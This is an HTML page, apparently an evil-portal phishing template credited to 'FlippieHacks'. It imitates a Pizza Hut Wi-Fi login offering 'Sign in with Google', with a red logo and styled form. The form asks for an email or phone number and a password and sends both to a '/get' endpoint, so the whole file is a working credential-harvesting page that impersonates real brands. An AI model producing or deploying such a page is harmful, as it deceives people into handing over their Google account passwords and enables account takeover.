<!--By FlippieHacks
https://github.com/FlippieHacks/ -->
<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #fe0000;
  margin-right: 100px
}


.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

}
h1 {
  text-align: center; 
  font-size: 70px;
  font-weight: 500;
  color: #fe0000;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #fe0000;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 4px solid #fe0000;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #fe0000;
  border: none;
  color: #000000;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  font-weight: bold;
  display: block;
  margin: auto;
}

.submit-btn:hover {
  background: #013c80;
}



</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="350.000000pt" height="100.000000pt" viewBox="0 0 350.000000 100.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,100.000000) scale(0.100000,-0.100000)"
fill="#fe0000" stroke="none">
<path d="M979 697 l-83 -203 -426 -186 c-346 -152 -426 -191 -428 -207 l-3
-21 1690 0 1691 0 0 23 c-1 19 -48 43 -423 207 l-422 186 -84 202 -84 202
-672 0 -672 0 -84 -203z"/>
</g>
</svg>


  </div>

  <div class="form-container">

    <center><h1>Pizza Hut</h1>
			<h2>Sign in with </b>Google</b></h2>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email or mobile phone number" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

      <button class="submit-btn" type="submit">Connnect</button>
	  
    </form>

  </div>

</div>
</body>
</html>
